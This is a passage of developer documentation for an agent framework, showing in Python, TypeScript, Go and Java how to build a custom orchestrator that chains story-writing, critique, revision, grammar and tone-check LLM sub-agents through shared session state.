**Managing State:** Read from and write to the session state dictionary (`ctx.session.state`) to pass data between sub-agent calls or make decisions: ```python # Read data set by a previous agent previous_result = ctx.session.state.get("some_key") # Make a decision based on state if previous_result == "some_value": # ... call a specific sub-agent ... else: # ... call another sub-agent ... # Store a result for a later step (often done via a sub-agent's output_key) # ctx.session.state["my_custom_result"] = "calculated_value" ``` 1. **Implementing Control Flow:** Use standard Python constructs (`if`/`elif`/`else`, `for`/`while` loops, `try`/`except`) to create sophisticated, conditional, or iterative workflows involving your sub-agents. 1. **Calling Sub-Agents:** You invoke sub-agents (which are typically stored as instance properties like `this.myLlmAgent`) using their `run` method and yield their events: ```typescript for await (const event of this.someSubAgent.runAsync(ctx)) { // Optionally inspect or log the event yield event; // Pass the event up to the runner } ``` 1. **Managing State:** Read from and write to the session state object (`ctx.session.state`) to pass data between sub-agent calls or make decisions: ```typescript // Read data set by a previous agent const previousResult = ctx.session.state['some_key']; // Make a decision based on state if (previousResult === 'some_value') { // ... call a specific sub-agent ... } else { // ... call another sub-agent ... } // Store a result for a later step (often done via a sub-agent's outputKey) // ctx.session.state['my_custom_result'] = 'calculated_value'; ``` 1. **Implementing Control Flow:** Use standard TypeScript/JavaScript constructs (`if`/`else`, `for`/`while` loops, `try`/`catch`) to create sophisticated, conditional, or iterative workflows involving your sub-agents. 1. **Calling Sub-Agents:** You invoke sub-agents by calling their `Run` method. ```go // Example: Running one sub-agent and yielding its events for event, err := range someSubAgent.Run(ctx) { if err != nil { // Handle or propagate the error return } // Yield the event up to the caller if !yield(event, nil) { return } } ``` 1. **Managing State:** Read from and write to the session state to pass data between sub-agent calls or make decisions. ```go // The `ctx` (`agent.InvocationContext`) is passed directly to your agent's `Run` function. // Read data set by a previous agent previousResult, err := ctx.Session().State().Get("some_key") if err != nil { // Handle cases where the key might not exist yet } // Make a decision based on state if val, ok := previousResult.(string); ok && val == "some_value" { // ... call a specific sub-agent ... } else { // ... call another sub-agent ... } // Store a result for a later step if err := ctx.Session().State().Set("my_custom_result", "calculated_value"); err != nil { // Handle error } ``` 1. **Implementing Control Flow:** Use standard Go constructs (`if`/`else`, `for`/`switch` loops, goroutines, channels) to create sophisticated, conditional, or iterative workflows involving your sub-agents. 1. **Calling Sub-Agents:** You invoke sub-agents (which are typically stored as instance attributes or objects) using their asynchronous run method and return their event streams: You typically chain `Flowable`s from sub-agents using RxJava operators like `concatWith`, `flatMapPublisher`, or `concatArray`. ```java // Example: Running one sub-agent // return someSubAgent.runAsync(ctx); // Example: Running sub-agents sequentially Flowable firstAgentEvents = someSubAgent1.runAsync(ctx) .doOnNext(event -> System.out.println("Event from agent 1: " + event.id())); Flowable secondAgentEvents = Flowable.defer(() -> someSubAgent2.runAsync(ctx) .doOnNext(event -> System.out.println("Event from agent 2: " + event.id())) ); return firstAgentEvents.concatWith(secondAgentEvents); ``` The `Flowable.defer()` is often used for subsequent stages if their execution depends on the completion or state after prior stages. 1. **Managing State:** Read from and write to the session state to pass data between sub-agent calls or make decisions. The session state is a `java.util.concurrent.ConcurrentMap` obtained via `ctx.session().state()`. ```java // Read data set by a previous agent Object previousResult = ctx.session().state().get("some_key"); // Make a decision based on state if ("some_value".equals(previousResult)) { // ... logic to include a specific sub-agent's Flowable ... } else { // ... logic to include another sub-agent's Flowable ... } // Store a result for a later step (often done via a sub-agent's output_key) // ctx.session().state().put("my_custom_result", "calculated_value"); ``` 1. **Implementing Control Flow:** Use standard language constructs (`if`/`else`, loops, `try`/`catch`) combined with reactive operators (RxJava) to create sophisticated workflows. - **Conditional:** `Flowable.defer()` to choose which `Flowable` to subscribe to based on a condition, or `filter()` if you're filtering events within a stream. - **Iterative:** Operators like `repeat()`, `retry()`, or by structuring your `Flowable` chain to recursively call parts of itself based on conditions (often managed with `flatMapPublisher` or `concatMap`). ## Managing Sub-Agents and State Typically, a custom agent orchestrates other agents (like `LlmAgent`, `LoopAgent`, etc.). - **Initialization:** You usually pass instances of these sub-agents into your custom agent's constructor and store them as instance fields/attributes (e.g., `this.story_generator = story_generator_instance` or `self.story_generator = story_generator_instance`). This makes them accessible within the custom agent's core asynchronous execution logic (such as: `_run_async_impl` method). - **Sub Agents List:** When initializing the `BaseAgent` using it's `super()` constructor, you should pass a `sub agents` list. This list tells the ADK framework about the agents that are part of this custom agent's immediate hierarchy. It's important for framework features like lifecycle management, introspection, and potentially future routing capabilities, even if your core execution logic (`_run_async_impl`) calls the agents directly via `self.xxx_agent`. Include the agents that your custom logic directly invokes at the top level. - **State:** As mentioned, `ctx.session.state` is the standard way sub-agents (especially `LlmAgent`s using `output key`) communicate results back to the orchestrator and how the orchestrator passes necessary inputs down. ## Design Pattern Example: `StoryFlowAgent` Let's illustrate the power of custom agents with an example pattern: a multi-stage content generation workflow with conditional logic. **Goal:** Create a system that generates a story, iteratively refines it through critique and revision, performs final checks, and crucially, *regenerates the story if the final tone check fails*. **Why Custom?** The core requirement driving the need for a custom agent here is the **conditional regeneration based on the tone check**. Standard workflow agents don't have built-in conditional branching based on the outcome of a sub-agent's task. We need custom logic (`if tone == "negative": ...`) within the orchestrator. ______________________________________________________________________ ### Part 1: Simplified custom agent Initialization We define the `StoryFlowAgent` inheriting from `BaseAgent`. In `__init__`, we store the necessary sub-agents (passed in) as instance attributes and tell the `BaseAgent` framework about the top-level agents this custom agent will directly orchestrate. ```python class StoryFlowAgent(BaseAgent): """ Custom agent for a story generation and refinement workflow. This agent orchestrates a sequence of LLM agents to generate a story, critique it, revise it, check grammar and tone, and potentially regenerate the story if the tone is negative. """ # --- Field Declarations for Pydantic --- # Declare the agents passed during initialization as class attributes with type hints story_generator: LlmAgent critic: LlmAgent reviser: LlmAgent grammar_check: LlmAgent tone_check: LlmAgent loop_agent: LoopAgent sequential_agent: SequentialAgent # model_config allows setting Pydantic configurations if needed, e.g., arbitrary_types_allowed model_config = {"arbitrary_types_allowed": True} def __init__( self, name: str, story_generator: LlmAgent, critic: LlmAgent, reviser: LlmAgent, grammar_check: LlmAgent, tone_check: LlmAgent, ): """ Initializes the StoryFlowAgent. Args: name: The name of the agent. story_generator: An LlmAgent to generate the initial story. critic: An LlmAgent to critique the story. reviser: An LlmAgent to revise the story based on criticism. grammar_check: An LlmAgent to check the grammar. tone_check: An LlmAgent to analyze the tone. """ # Create internal agents *before* calling super().__init__ loop_agent = LoopAgent( name="CriticReviserLoop", sub_agents=[critic, reviser], max_iterations=2 ) sequential_agent = SequentialAgent( name="PostProcessing", sub_agents=[grammar_check, tone_check] ) # Define the sub_agents list for the framework sub_agents_list = [ story_generator, loop_agent, sequential_agent, ] # Pydantic will validate and assign them based on the class annotations. super().__init__( name=name, story_generator=story_generator, critic=critic, reviser=reviser, grammar_check=grammar_check, tone_check=tone_check, loop_agent=loop_agent, sequential_agent=sequential_agent, sub_agents=sub_agents_list, # Pass the sub_agents list directly ) ``` We define the `StoryFlowAgent` by extending `BaseAgent`. In its constructor, we: 1. Create any internal composite agents (like `LoopAgent` or `SequentialAgent`). 1. Pass the list of all top-level sub-agents to the `super()` constructor. 1. Store the sub-agents (passed in or created internally) as instance properties (e.g., `this.storyGenerator`) so they can be accessed in the custom `runImpl` logic. ```typescript class StoryFlowAgent extends BaseAgent { // --- Property Declarations for TypeScript --- private storyGenerator: LlmAgent; private critic: LlmAgent; private reviser: LlmAgent; private grammarCheck: LlmAgent; private toneCheck: LlmAgent; private loopAgent: LoopAgent; private sequentialAgent: SequentialAgent; constructor( name: string, storyGenerator: LlmAgent, critic: LlmAgent, reviser: LlmAgent, grammarCheck: LlmAgent, toneCheck: LlmAgent ) { // Create internal composite agents const loopAgent = new LoopAgent({ name: "CriticReviserLoop", subAgents: [critic, reviser], maxIterations: 2, }); const sequentialAgent = new SequentialAgent({ name: "PostProcessing", subAgents: [grammarCheck, toneCheck], }); // Define the sub-agents for the framework to know about const subAgentsList = [ storyGenerator, loopAgent, sequentialAgent, ]; // Call the parent constructor super({ name, subAgents: subAgentsList, }); // Assign agents to class properties for use in the custom run logic this.storyGenerator = storyGenerator; this.critic = critic; this.reviser = reviser; this.grammarCheck = grammarCheck; this.toneCheck = toneCheck; this.loopAgent = loopAgent; this.sequentialAgent = sequentialAgent; } ``` We define the `StoryFlowAgent` struct and a constructor. In the constructor, we store the necessary sub-agents and tell the `BaseAgent` framework about the top-level agents this custom agent will directly orchestrate. ```go // StoryFlowAgent is a custom agent that orchestrates a story generation workflow. // It encapsulates the logic of running sub-agents in a specific sequence. type StoryFlowAgent struct { storyGenerator agent.Agent revisionLoopAgent agent.Agent postProcessorAgent agent.Agent } // NewStoryFlowAgent creates and configures the entire custom agent workflow. // It takes individual LLM agents as input and internally creates the necessary // workflow agents (loop, sequential), returning the final orchestrator agent. func NewStoryFlowAgent( storyGenerator, critic, reviser, grammarCheck, toneCheck agent.Agent, ) (agent.Agent, error) { loopAgent, err := loopagent.New(loopagent.Config{ MaxIterations: 2, AgentConfig: agent.Config{ Name: "CriticReviserLoop", SubAgents: []agent.Agent{critic, reviser}, }, }) if err != nil { return nil, fmt.Errorf("failed to create loop agent: %w", err) } sequentialAgent, err := sequentialagent.New(sequentialagent.Config{ AgentConfig: agent.Config{ Name: "PostProcessing", SubAgents: []agent.Agent{grammarCheck, toneCheck}, }, }) if err != nil { return nil, fmt.Errorf("failed to create sequential agent: %w", err) } // The StoryFlowAgent struct holds the agents needed for the Run method. orchestrator := &StoryFlowAgent{ storyGenerator: storyGenerator, revisionLoopAgent: loopAgent, postProcessorAgent: sequentialAgent, } // agent.New creates the final agent, wiring up the Run method. return agent.New(agent.Config{ Name: "StoryFlowAgent", Description: "Orchestrates story generation, critique, revision, and checks.", SubAgents: []agent.Agent{storyGenerator, loopAgent, sequentialAgent}, Run: orchestrator.Run, }) } ``` We define the `StoryFlowAgentExample` by extending `BaseAgent`. In its **constructor**, we store the necessary sub-agent instances (passed as parameters) as instance fields. These top-level sub-agents, which this custom agent will directly orchestrate, are also passed to the `super` constructor of `BaseAgent` as a list. ```java private final LlmAgent storyGenerator; private final LoopAgent loopAgent; private final SequentialAgent sequentialAgent; public StoryFlowAgentExample( String name, LlmAgent storyGenerator, LoopAgent loopAgent, SequentialAgent sequentialAgent) { super( name, "Orchestrates story generation, critique, revision, and checks.", List.of(storyGenerator, loopAgent, sequentialAgent), null, null); this.storyGenerator = storyGenerator; this.loopAgent = loopAgent; this.sequentialAgent = sequentialAgent; } ``` ______________________________________________________________________ ### Part 2: Defining the Custom Execution Logic This method orchestrates the sub-agents using standard Python async/await and control flow. ```python @override async def _run_async_impl( self, ctx: InvocationContext ) -> AsyncGenerator[Event, None]: """ Implements the custom orchestration logic for the story workflow. Uses the instance attributes assigned by Pydantic (e.g., self.story_generator). """ logger.info(f"[{self.name}] Starting story generation workflow.") # 1. Initial Story Generation logger.info(f"[{self.name}] Running StoryGenerator...") async for event in self.story_generator.run_async(ctx): logger.info(f"[{self.name}] Event from StoryGenerator: {event.model_dump_json(indent=2, exclude_none=True)}") yield event # Check if story was generated before proceeding if "current_story" not in ctx.session.state or not ctx.session.state["current_story"]: logger.error(f"[{self.name}] Failed to generate initial story. Aborting workflow.") return # Stop processing if initial story failed logger.info(f"[{self.name}] Story state after generator: {ctx.session.state.get('current_story')}") # 2. Critic-Reviser Loop logger.info(f"[{self.name}] Running CriticReviserLoop...") # Use the loop_agent instance attribute assigned during init async for event in self.loop_agent.run_async(ctx): logger.info(f"[{self.name}] Event from CriticReviserLoop: {event.model_dump_json(indent=2, exclude_none=True)}") yield event logger.info(f"[{self.name}] Story state after loop: {ctx.session.state.get('current_story')}") # 3. Sequential Post-Processing (Grammar and Tone Check) logger.info(f"[{self.name}] Running PostProcessing...") # Use the sequential_agent instance attribute assigned during init async for event in self.sequential_agent.run_async(ctx): logger.info(f"[{self.name}] Event from PostProcessing: {event.model_dump_json(indent=2, exclude_none=True)}") yield event # 4. Tone-Based Conditional Logic tone_check_result = ctx.session.state.get("tone_check_result") logger.info(f"[{self.name}] Tone check result: {tone_check_result}") if tone_check_result == "negative": logger.info(f"[{self.name}] Tone is negative. Regenerating story...") async for event in self.story_generator.run_async(ctx): logger.info(f"[{self.name}] Event from StoryGenerator (Regen): {event.model_dump_json(indent=2, exclude_none=True)}") yield event else: logger.info(f"[{self.name}] Tone is not negative. Keeping current story.") pass logger.info(f"[{self.name}] Workflow finished.") ``` **Explanation of Logic:** 1. The initial `story_generator` runs. Its output is expected to be in `ctx.session.state["current_story"]`. 1. The `loop_agent` runs, which internally calls the `critic` and `reviser` sequentially for `max_iterations` times. They read/write `current_story` and `criticism` from/to the state. 1. The `sequential_agent` runs, calling `grammar_check` then `tone_check`, reading `current_story` and writing `grammar_suggestions` and `tone_check_result` to the state. 1. **Custom Part:** The `if` statement checks the `tone_check_result` from the state. If it's "negative", the `story_generator` is called *again*, overwriting the `current_story` in the state. Otherwise, the flow ends. The `runImpl` method orchestrates the sub-agents using standard TypeScript `async`/`await` and control flow. The `runLiveImpl` is also added to handle live streaming scenarios. ```typescript // Implements the custom orchestration logic for the story workflow. async* runLiveImpl(ctx: InvocationContext): AsyncGenerator { yield* this.runAsyncImpl(ctx); } // Implements the custom orchestration logic for the story workflow. async* runAsyncImpl(ctx: InvocationContext): AsyncGenerator { console.log(`[${this.name}] Starting story generation workflow.`); // 1. Initial Story Generation console.log(`[${this.name}] Running StoryGenerator...`); for await (const event of this.storyGenerator.runAsync(ctx)) { console.log(`[${this.name}] Event from StoryGenerator: ${JSON.stringify(event, null, 2)}`); yield event; } // Check if the story was generated before proceeding if (!ctx.session.state["current_story"]) { console.error(`[${this.name}] Failed to generate initial story. Aborting workflow.`); return; // Stop processing } console.log(`[${this.name}] Story state after generator: ${ctx.session.state['current_story']}`); // 2. Critic-Reviser Loop console.log(`[${this.name}] Running CriticReviserLoop...`); for await (const event of this.loopAgent.runAsync(ctx)) { console.log(`[${this.name}] Event from CriticReviserLoop: ${JSON.stringify(event, null, 2)}`); yield event; } console.log(`[${this.name}] Story state after loop: ${ctx.session.state['current_story']}`); // 3. Sequential Post-Processing (Grammar and Tone Check) console.log(`[${this.name}] Running PostProcessing...`); for await (const event of this.sequentialAgent.runAsync(ctx)) { console.log(`[${this.name}] Event from PostProcessing: ${JSON.stringify(event, null, 2)}`); yield event; } // 4. Tone-Based Conditional Logic const toneCheckResult = ctx.session.state["tone_check_result"] as string; console.log(`[${this.name}] Tone check result: ${toneCheckResult}`); if (toneCheckResult === "negative") { console.log(`[${this.name}] Tone is negative. Regenerating story...`); for await (const event of this.storyGenerator.runAsync(ctx)) { console.log(`[${this.name}] Event from StoryGenerator (Regen): ${JSON.stringify(event, null, 2)}`); yield event; } } else { console.log(`[${this.name}] Tone is not negative. Keeping current story.`); } console.log(`[${this.name}] Workflow finished.`); } ``` **Explanation of Logic:** 1. The initial `storyGenerator` runs. Its output is expected to be in `ctx.session.state['current_story']`. 1. The `loopAgent` runs, which internally calls the `critic` and `reviser` sequentially for `maxIterations` times. They read/write `current_story` and `criticism` from/to the state. 1. The `sequentialAgent` runs, calling `grammarCheck` then `toneCheck`, reading `current_story` and writing `grammar_suggestions` and `tone_check_result` to the state. 1. **Custom Part:** The `if` statement checks the `tone_check_result` from the state. If it's "negative", the `storyGenerator` is called *again*, overwriting the `current_story` in the state. Otherwise, the flow ends. The `Run` method orchestrates the sub-agents by calling their respective `Run` methods in a loop and yielding their events. ```go // Run defines the custom execution logic for the StoryFlowAgent. func (s *StoryFlowAgent) Run(ctx agent.InvocationContext) iter.Seq2[*session.Event, error] { return func(yield func(*session.Event, error) bool) { // Stage 1: Initial Story Generation for event, err := range s.storyGenerator.Run(ctx) { if err != nil { yield(nil, fmt.Errorf("story generator failed: %w", err)) return } if !yield(event, nil) { return } } // Check if story was generated before proceeding currentStory, err := ctx.Session().State().Get("current_story") if err != nil || currentStory == "" { log.Println("Failed to generate initial story. Aborting workflow.") return } // Stage 2: Critic-Reviser Loop for event, err := range s.revisionLoopAgent.Run(ctx) { if err != nil { yield(nil, fmt.Errorf("loop agent failed: %w", err)) return } if !yield(event, nil) { return } } // Stage 3: Post-Processing for event, err := range s.postProcessorAgent.Run(ctx) { if err != nil { yield(nil, fmt.Errorf("sequential agent failed: %w", err)) return } if !yield(event, nil) { return } } // Stage 4: Conditional Regeneration toneResult, err := ctx.Session().State().Get("tone_check_result") if err != nil { log.Printf("Could not read tone_check_result from state: %v. Assuming tone is not negative.", err) return } if tone, ok := toneResult.(string); ok && tone == "negative" { log.Println("Tone is negative. Regenerating story...") for event, err := range s.storyGenerator.Run(ctx) { if err != nil { yield(nil, fmt.Errorf("story regeneration failed: %w", err)) return } if !yield(event, nil) { return } } } else { log.Println("Tone is not negative. Keeping current story.") } } } ``` **Explanation of Logic:** 1. The initial `storyGenerator` runs. Its output is expected to be in the session state under the key `"current_story"`. 1. The `revisionLoopAgent` runs, which internally calls the `critic` and `reviser` sequentially for `max_iterations` times. They read/write `current_story` and `criticism` from/to the state. 1. The `postProcessorAgent` runs, calling `grammar_check` then `tone_check`, reading `current_story` and writing `grammar_suggestions` and `tone_check_result` to the state. 1. **Custom Part:** The code checks the `tone_check_result` from the state. If it's "negative", the `story_generator` is called *again*, overwriting the `current_story` in the state. Otherwise, the flow ends. The `runAsyncImpl` method orchestrates the sub-agents using RxJava's Flowable streams and operators for asynchronous control flow. ```java @Override protected Flowable runAsyncImpl(InvocationContext invocationContext) { // Implements the custom orchestration logic for the story workflow. // Uses the instance attributes assigned by Pydantic (e.g., self.story_generator). logger.log(Level.INFO, () -> String.format("[%s] Starting story generation workflow.", name())); // Stage 1. Initial Story Generation Flowable storyGenFlow = runStage(storyGenerator, invocationContext, "StoryGenerator"); // Stage 2: Critic-Reviser Loop (runs after story generation completes) Flowable criticReviserFlow = Flowable.defer(() -> { if (!isStoryGenerated(invocationContext)) { logger.log(Level.SEVERE,() -> String.format("[%s] Failed to generate initial story. Aborting after StoryGenerator.", name())); return Flowable.empty(); // Stop further processing if no story } logger.log(Level.INFO, () -> String.format("[%s] Story state after generator: %s", name(), invocationContext.session().state().get("current_story"))); return runStage(loopAgent, invocationContext, "CriticReviserLoop"); }); // Stage 3: Post-Processing (runs after critic-reviser loop completes) Flowable postProcessingFlow = Flowable.defer(() -> { logger.log(Level.INFO, () -> String.format("[%s] Story state after loop: %s", name(), invocationContext.session().state().get("current_story"))); return runStage(sequentialAgent, invocationContext, "PostProcessing"); }); // Stage 4: Conditional Regeneration (runs after post-processing completes) Flowable conditionalRegenFlow = Flowable.defer(() -> { String toneCheckResult = (String) invocationContext.session().state().get("tone_check_result"); logger.log(Level.INFO, () -> String.format("[%s] Tone check result: %s", name(), toneCheckResult)); if ("negative".equalsIgnoreCase(toneCheckResult)) { logger.log(Level.INFO, () -> String.format("[%s] Tone is negative. Regenerating story...", name())); return runStage(storyGenerator, invocationContext, "StoryGenerator (Regen)"); } else { logger.log(Level.INFO, () -> String.format("[%s] Tone is not negative. Keeping current story.", name())); return Flowable.empty(); // No regeneration needed } }); return Flowable.concatArray(storyGenFlow, criticReviserFlow, postProcessingFlow, conditionalRegenFlow) .doOnComplete(() -> logger.log(Level.INFO, () -> String.format("[%s] Workflow finished.", name()))); } // Helper method for a single agent run stage with logging private Flowable runStage(BaseAgent agentToRun, InvocationContext ctx, String stageName) { logger.log(Level.INFO, () -> String.format("[%s] Running %s...", name(), stageName)); return agentToRun .runAsync(ctx) .doOnNext(event -> logger.log(Level.INFO,() -> String.format("[%s] Event from %s: %s", name(), stageName, event.toJson()))) .doOnError(err -> logger.log(Level.SEVERE, String.format("[%s] Error in %s", name(), stageName), err)) .doOnComplete(() -> logger.log(Level.INFO, () -> String.format("[%s] %s finished.", name(), stageName))); } ``` **Explanation of Logic:** 1. The initial `storyGenerator.runAsync(invocationContext)` Flowable is executed. Its output is expected to be in `invocationContext.session().state().get("current_story")`. 1. The `loopAgent's` Flowable runs next (due to `Flowable.concatArray` and `Flowable.defer`). The LoopAgent internally calls the `critic` and `reviser` sub-agents sequentially for up to `maxIterations`. They read/write `current_story` and `criticism` from/to the state. 1. Then, the `sequentialAgent's` Flowable executes. It calls the `grammar_check` then `tone_check`, reading `current_story` and writing `grammar_suggestions` and `tone_check_result` to the state. 1. **Custom Part:** After the sequentialAgent completes, logic within a `Flowable.defer` checks the "tone_check_result" from `invocationContext.session().state()`. If it's "negative", the `storyGenerator` Flowable is *conditionally concatenated* and executed again, overwriting "current_story". Otherwise, an empty Flowable is used, and the overall workflow proceeds to completion. ______________________________________________________________________ ### Part 3: Defining the LLM Sub-Agents These are standard `LlmAgent` definitions, responsible for specific tasks. Their `output key` parameter is crucial for placing results into the `session.state` where other agents or the custom orchestrator can access them. Direct State Injection in Instructions Notice the `story_generator`'s instruction. The `{var}` syntax is a placeholder. Before the instruction is sent to the LLM, the ADK framework automatically replaces (Example:`{topic}`) with the value of `session.state['topic']`. This is the recommended way to provide context to an agent, using templating in the instructions. For more details, see the [State documentation](https://google.github.io/adk-docs/sessions/state/#accessing-session-state-in-agent-instructions). ```python GEMINI_2_FLASH = "gemini-2.0-flash" # Define model constant # --- Define the individual LLM agents --- story_generator = LlmAgent( name="StoryGenerator", model=GEMINI_2_FLASH, instruction="""You are a story writer. Write a short story (around 100 words), on the following topic: {topic}""", input_schema=None, output_key="current_story", # Key for storing output in session state ) critic = LlmAgent( name="Critic", model=GEMINI_2_FLASH, instruction="""You are a story critic. Review the story provided: {{current_story}}. Provide 1-2 sentences of constructive criticism on how to improve it. Focus on plot or character.""", input_schema=None, output_key="criticism", # Key for storing criticism in session state ) reviser = LlmAgent( name="Reviser", model=GEMINI_2_FLASH, instruction="""You are a story reviser. Revise the story provided: {{current_story}}, based on the criticism in {{criticism}}. Output only the revised story.""", input_schema=None, output_key="current_story", # Overwrites the original story ) grammar_check = LlmAgent( name="GrammarCheck", model=GEMINI_2_FLASH, instruction="""You are a grammar checker. Check the grammar of the story provided: {current_story}. Output only the suggested corrections as a list, or output 'Grammar is good!' if there are no errors.""", input_schema=None, output_key="grammar_suggestions", ) tone_check = LlmAgent( name="ToneCheck", model=GEMINI_2_FLASH, instruction="""You are a tone analyzer. Analyze the tone of the story provided: {current_story}. Output only one word: 'positive' if the tone is generally positive, 'negative' if the tone is generally negative, or 'neutral' otherwise.""", input_schema=None, output_key="tone_check_result", # This agent's output determines the conditional flow ) ``` ```typescript // --- Define the individual LLM agents --- const storyGenerator = new LlmAgent({ name: "StoryGenerator", model: GEMINI_MODEL, instruction: `You are a story writer. Write a short story (around 100 words), on the following topic: {topic}`, outputKey: "current_story", }); const critic = new LlmAgent({ name: "Critic", model: GEMINI_MODEL, instruction: `You are a story critic. Review the story provided: {{current_story}}. Provide 1-2 sentences of constructive criticism on how to improve it. Focus on plot or character.`, outputKey: "criticism", }); const reviser = new LlmAgent({ name: "Reviser", model: GEMINI_MODEL, instruction: `You are a story reviser. Revise the story provided: {{current_story}}, based on the criticism in {{criticism}}. Output only the revised story.`, outputKey: "current_story", // Overwrites the original story }); const grammarCheck = new LlmAgent({ name: "GrammarCheck", model: GEMINI_MODEL, instruction: `You are a grammar checker. Check the grammar of the story provided: {current_story}. Output only the suggested corrections as a list, or output 'Grammar is good!' if there are no errors.`, outputKey: "grammar_suggestions", }); const toneCheck = new LlmAgent({ name: "ToneCheck", model: GEMINI_MODEL, instruction: `You are a tone analyzer. Analyze the tone of the story provided: {current_story}. Output only one word: 'positive' if the tone is generally positive, 'negative' if the tone is generally negative, or 'neutral' otherwise.`, outputKey: "tone_check_result", }); ``` ```go // --- Define the individual LLM agents --- storyGenerator, err := llmagent.New(llmagent.Config{ Name: "StoryGenerator", Model: model, Description: "Generates the initial story.", Instruction: "You are a story writer. Write a short story (around 100 words) about a cat, based on the topic: {topic}", OutputKey: "current_story", }) if err != nil { log.Fatalf("Failed to create StoryGenerator agent: %v", err) } critic, err := llmagent.New(llmagent.Config{ Name: "Critic", Model: model, Description: "Critiques the story.", Instruction: "You are a story critic. Review the story: {current_story}. Provide 1-2 sentences of constructive criticism on how to improve it. Focus on plot or character.", OutputKey: "criticism", }) if err != nil { log.Fatalf("Failed to create Critic agent: %v", err) } reviser, err := llmagent.New(llmagent.Config{ Name: "Reviser", Model: model, Description: "Revises the story based on criticism.", Instruction: "You are a story reviser. Revise the story: {current_story}, based on the criticism: {criticism}. Output only the revised story.", OutputKey: "current_story", }) if err != nil { log.Fatalf("Failed to create Reviser agent: %v", err) } grammarCheck, err := llmagent.New(llmagent.Config{ Name: "GrammarCheck", Model: model, Description: "Checks grammar and suggests corrections.", Instruction: "You are a grammar checker. Check the grammar of the story: {current_story}. Output only the suggested corrections as a list, or output 'Grammar is good!' if there are no errors.", OutputKey: "grammar_suggestions", }) if err != nil { log.Fatalf("Failed to create GrammarCheck agent: %v", err) } toneCheck, err := llmagent.New(llmagent.Config{ Name: "ToneCheck", Model: model, Description: "Analyzes the tone of the story.", Instruction: "You are a tone analyzer. Analyze the tone of the story: {current_story}. Output only one word: 'positive' if the tone is generally positive, 'negative' if the tone is generally negative, or 'neutral' otherwise.", OutputKey: "tone_check_result", }) if err != nil { log.Fatalf("Failed to create ToneCheck agent: %v", err) } ``` ```java // --- Define the individual LLM agents --- LlmAgent storyGenerator = LlmAgent.builder() .name("StoryGenerator") .model(MODEL_NAME) .description("Generates the initial story.") .instruction( """ You are a story writer. Write a short story (around 100 words) about a cat, based on the topic: {topic} """) .inputSchema(null) .outputKey("current_story") // Key for storing output in session state .build(); LlmAgent critic = LlmAgent.builder() .name("Critic") .model(MODEL_NAME) .description("Critiques the story.") .instruction( """ You are a story critic. Review the story: {current_story}. Provide 1-2 sentences of constructive criticism on how to improve it. Focus on plot or character. """) .inputSchema(null) .outputKey("criticism") // Key for storing criticism in session state .build(); LlmAgent reviser = LlmAgent.builder() .name("Reviser") .model(MODEL_NAME) .description("Revises the story based on criticism.") .instruction( """ You are a story reviser. Revise the story: {current_story}, based on the criticism: {criticism}. Output only the revised story. """) .inputSchema(null) .outputKey("current_story") // Overwrites the original story .build(); LlmAgent grammarCheck = LlmAgent.builder() .name("GrammarCheck") .model(MODEL_NAME) .description("Checks grammar and suggests corrections.") .instruction( """ You are a grammar checker. Check the grammar of the story: {current_story}. Output only the suggested corrections as a list, or output 'Grammar is good!' if there are no errors. """) .outputKey("grammar_suggestions") .build(); LlmAgent toneCheck = LlmAgent.builder() .name("ToneCheck") .model(MODEL_NAME) .description("Analyzes the tone of the story.") .instruction( """ You are a tone analyzer. Analyze the tone of the story: {current_story}. Output only one word: 'positive' if the tone is generally positive, 'negative' if the tone is generally negative, or 'neutral' otherwise. """) .outputKey("tone_check_result") // This agent's output determines the conditional flow .build(); LoopAgent loopAgent = LoopAgent.builder() .name("CriticReviserLoop") .description("Iteratively critiques and revises the story.") .subAgents(critic, reviser) .maxIterations(2) .build(); SequentialAgent sequentialAgent = SequentialAgent.builder() .name("PostProcessing") .description("Performs grammar and tone checks sequentially.") .subAgents(grammarCheck, toneCheck) .build(); ``` ______________________________________________________________________ ### Part 4: Instantiating and Running the custom agent Finally, you instantiate your `StoryFlowAgent` and use the `Runner` as usual. ```python # --- Create the custom agent instance --- story_flow_agent = StoryFlowAgent( name="StoryFlowAgent", story_generator=story_generator, critic=critic, reviser=reviser, grammar_check=grammar_check, tone_check=tone_check, ) INITIAL_STATE = {"topic": "a brave kitten exploring a haunted house"} # --- Setup Runner and Session --- async def setup_session_and_runner(): session_service = InMemorySessionService() session = await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID, state=INITIAL_STATE) logger.info(f"Initial session state: {session.state}") runner = Runner( agent=story_flow_agent, # Pass the custom orchestrator agent app_name=APP_NAME, session_service=session_service ) return session_service, runner # --- Function to Interact with the Agent --- async def call_agent_async(user_input_topic: str): """ Sends a new topic to the agent (overwriting the initial one if needed) and runs the workflow. """ session_service, runner = await setup_session_and_runner() current_session = session_service.sessions[APP_NAME][USER_ID][SESSION_ID] current_session.state["topic"] = user_input_topic logger.info(f"Updated session state topic to: {user_input_topic}") content = types.Content(role='user', parts=[types.Part(text=f"Generate a story about the preset topic.")]) events = runner.run_async(user_id=USER_ID, session_id=SESSION_ID, new_message=content) final_response = "No final response captured." async for event in events: if event.is_final_response() and event.content and event.content.parts: logger.info(f"Potential final response from [{event.author}]: {event.content.parts[0].text}") final_response = event.content.parts[0].text print("\n--- Agent Interaction Result ---") print("Agent Final Response: ", final_response) final_session = await session_service.get_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID) print("Final Session State:") import json print(json.dumps(final_session.state, indent=2)) print("-------------------------------\n") # --- Run the Agent --- # Note: In Colab, you can directly use 'await' at the top level. # If running this code as a standalone Python script, you'll need to use asyncio.run() or manage the event loop. await call_agent_async("a lonely robot finding a friend in a junkyard") ``` ```typescript // --- Create the custom agent instance --- const storyFlowAgent = new StoryFlowAgent( "StoryFlowAgent", storyGenerator, critic, reviser, grammarCheck, toneCheck ); const INITIAL_STATE = { "topic": "a brave kitten exploring a haunted house" }; // --- Setup Runner and Session --- async function setupRunnerAndSession() { const runner = new InMemoryRunner({ agent: storyFlowAgent, appName: APP_NAME, }); const session = await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID, state: INITIAL_STATE, }); console.log(`Initial session state: ${JSON.stringify(session.state, null, 2)}`); return runner; } // --- Function to Interact with the Agent --- async function callAgent(runner: InMemoryRunner, userInputTopic: string) { const currentSession = await runner.sessionService.getSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID }); if (!currentSession) { return; } // Update the state with the new topic for this run currentSession.state["topic"] = userInputTopic; console.log(`Updated session state topic to: ${userInputTopic}`); let finalResponse = "No final response captured."; for await (const event of runner.runAsync({ userId: 